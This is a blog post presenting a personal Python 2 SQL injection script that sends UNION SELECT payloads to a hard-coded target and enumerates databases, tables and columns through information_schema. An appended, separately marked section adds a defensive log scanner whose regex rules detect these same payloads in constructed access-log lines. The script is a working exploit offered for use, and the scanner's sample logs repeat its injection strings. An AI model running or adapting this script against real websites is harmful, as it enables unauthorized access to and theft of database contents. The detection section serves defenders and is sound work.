Personal SQLi script
Posted on sanbuzhi's blog
```python
# sqliIsSoEasy.py  (Python 2: print statements, raw_input, urllib.urlencode)
import requests
import urllib
import re

# Name of the injected query parameter. The original script never says which
# one it is (it only left an empty payload={} dict), so "id" is an assumption.
PARAM_NAME = "id"

payload_db = "1 and 1=2 union select 1,concat(0x7177657E,schema_name,0x7E717765) from INFORMATION_SCHEMA.SCHEMATA"

def payload_tb(database_name):
    # built inside a function: database_name is only known after the prompt below
    return "1 union select 1,concat(0x7177657E,table_name,0x7E717765) from information_schema.tables where table_schema=" + "'" + database_name + "'"

def payload_col(table_name):
    return "1 union select 1,concat(0x7177657E,column_name,0x7E717765) from information_schema.columns where table_name=" + "'" + table_name + "'"

# Union query with visible output: a regex checks whether the response contains
# the injected markers and, if so, returns the part between them.
def visitUrlByUnion(url, payload):
    data = urllib.urlencode({PARAM_NAME: payload})
    geturl = url + '?' + data
    response = requests.get(geturl)
    result = response.content
    # 0x7177657E / 0x7E717765 are "qwe~" / "~qwe", so every extracted value is delimited
    # (always return a list so the callers' loops work when nothing matched)
    return re.findall(r"qwe~(.+?)~qwe", result)

# List the databases
def getDBName(url):
    name_list = visitUrlByUnion(url, payload_db)
    print 'The databases:'
    for i in name_list:
        print i + " ",
    print " "

# Pick a database, list its tables
def getTBName(url):
    database_name = raw_input('please input your database:')
    name_list = visitUrlByUnion(url, payload_tb(database_name))
    print 'The tables:'
    for i in name_list:
        print i + " ",
    print " "

# Pick a table, list its columns
def getCOLName(url):
    table_name = raw_input('please input your table:')
    name_list = visitUrlByUnion(url, payload_col(table_name))
    print 'The columns:'
    for i in name_list:
        print i + " ",
    print " "

# Pick all columns, fetch the data
if __name__ == '__main__':
    url = 'http://192.168.106.130/config/sql.php'
    getDBName(url)
    getTBName(url)
    getCOLName(url)
```
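A defender-side counterpart, added here and not part of the original post: the script above wraps every extracted value in the hex markers 0x7177657E / 0x7E717765 ("qwe~" / "~qwe") so a regex can pull it out of the response, and those same markers, together with `union select` and `information_schema`, make the requests easy to spot in web server access logs. The log lines are constructed, and the combined-log format and the `id` parameter are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample access-log lines (Apache combined-log style); not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /config/sql.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /config/sql.php?id=1%20and%201%3D2%20union%20select%201,concat(0x7177657E,schema_name,0x7E717765)%20from%20INFORMATION_SCHEMA.SCHEMATA HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /config/sql.php?id=1+UNION+SELECT+1,concat(0x7177657e,table_name,0x7e717765)+from+information_schema.tables+where+table_schema%3D%27test%27 HTTP/1.1" 200 2048',
]

# ip, method and request target from a combined-log line (assumed log format)
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

# Rules run against each URL-decoded, lower-cased parameter value.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\."),
    # the "qwe~" / "~qwe" delimiters the script greps its output for
    "marker_hex": re.compile(r"0x7177657e|0x7e717765"),
}


def flag_request(line):
    """Return (ip, parameter, [matched rule names]) for a suspicious request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already decodes once; decoding again normalises values that were
        # percent-encoded twice before matching, and is a no-op otherwise
        decoded = unquote_plus(value).lower()
        hits = [rule for rule, rx in RULES.items() if rx.search(decoded)]
        if hits:
            return (m.group("ip"), name, hits)
    return None


def scan_log(lines):
    """All flagged requests in a list of log lines, in order."""
    return [hit for hit in (flag_request(line) for line in lines) if hit]


if __name__ == "__main__":
    for ip, param, hits in scan_log(SAMPLE_LOG):
        print(ip, param, ", ".join(hits))
```

Any single rule firing is worth an alert; all three together on one parameter is the exact fingerprint of the probe above, and the source IP gives the pivot for the rest of the investigation.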